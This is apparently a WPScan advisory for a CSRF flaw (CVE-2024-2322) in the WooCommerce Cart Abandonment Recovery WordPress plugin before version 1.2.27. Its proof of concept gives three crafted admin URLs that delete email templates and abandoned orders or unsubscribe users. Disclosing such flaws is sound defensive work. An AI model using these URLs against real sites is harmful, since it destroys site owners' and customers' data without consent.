WordPress Plugin Vulnerabilities

WooCommerce Cart Abandonment Recovery < 1.2.27 - Templates/Abandoned Orders Deletion via CSRF

Description

The plugin does not have CSRF check in its bulk actions, which could allow attackers to make logged in admins delete arbitrary email templates as well as delete and unsubscribe users from abandoned orders via CSRF attacks.

Proof of Concept

Make a logged in admin open one of the URLs below

- To make them delete the Email Template with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=email_tmpl&action2=email_tmpl&sub_action=delete_bulk_email_tmpl&id[]=1

- To make them delete the abandoned order with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=delete&action2=delete&id=1

- To make them unsubscribe the user from the abandon order with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=unsubscribe&action2=unsubscribe&id=1

Affects Plugins

Plugin icon
woo-cart-abandonment-recovery
Fixed in 1.2.27

References

CVE
CVE-2024-2322

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Submitter
Erwan LR (WPScan)
Verified
Yes
WPVDB ID
c740ed3b-d6b8-4afc-8c6b-a1ec37597055

Timeline

Publicly Published
2024-03-13 (about 2 months ago)
Added
2024-03-13 (about 2 months ago)
Last Updated
2024-03-13 (about 2 months ago)

Other

Published
Title
Published
2024-03-13
Title
Automatic < 3.92.1 - Cross-Site Request Forgery to Privilege Escalation
Published
2024-01-12
Title
InstaWP Connect < 0.1.0.9 - Cross-Site Request Forgery via create_file_db_manager
Published
2021-06-30
Title
Woocommerce Tabs Plugin, Add Custom Product Tabs <= 1.0.1 - Arbitrary Tab Deletion/Edition via CSRF
Published
2022-02-25
Title
Simple Membership < 4.1.0 - Arbitrary Transaction Deletion via CSRF
Published
2023-11-02
Title
WP Google My Business Auto Publish < 3.8 - Multiple CSRF